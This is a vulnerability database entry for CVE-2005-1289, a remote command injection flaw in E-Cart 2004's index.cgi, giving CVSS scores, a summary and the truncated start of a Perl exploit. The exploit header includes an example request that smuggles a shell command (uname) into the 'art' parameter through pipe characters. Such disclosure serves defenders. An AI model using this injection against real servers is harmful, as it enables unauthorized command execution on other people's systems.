7.5
CVSSv2

CVE-2005-1289

Published: 02/05/2005 Updated: 18/10/2016
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

index.cgi in E-Cart 2004 1.1 and previous versions allows remote malicious users to execute arbitrary commands via shell metacharacters in the (1) art and possibly (2) cat parameters.

Vulnerable Product Search on Vulmon Subscribe to Product

e-cart e-cart 2004_1.1

Exploits

#!/usr/bin/perl # # Example added if code doesn't work for ya: # SITE/DIRTOECART/indexcgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315dat|uname%20-a| # /str0ke # # # info: emanuele@orvietolugorg # use IO::Socket; print "\n\n ~~ wwwbadrootorg ~~ \n\n"; print " E-Cart E-Commerce Software indexcgi\n"; print " Re ...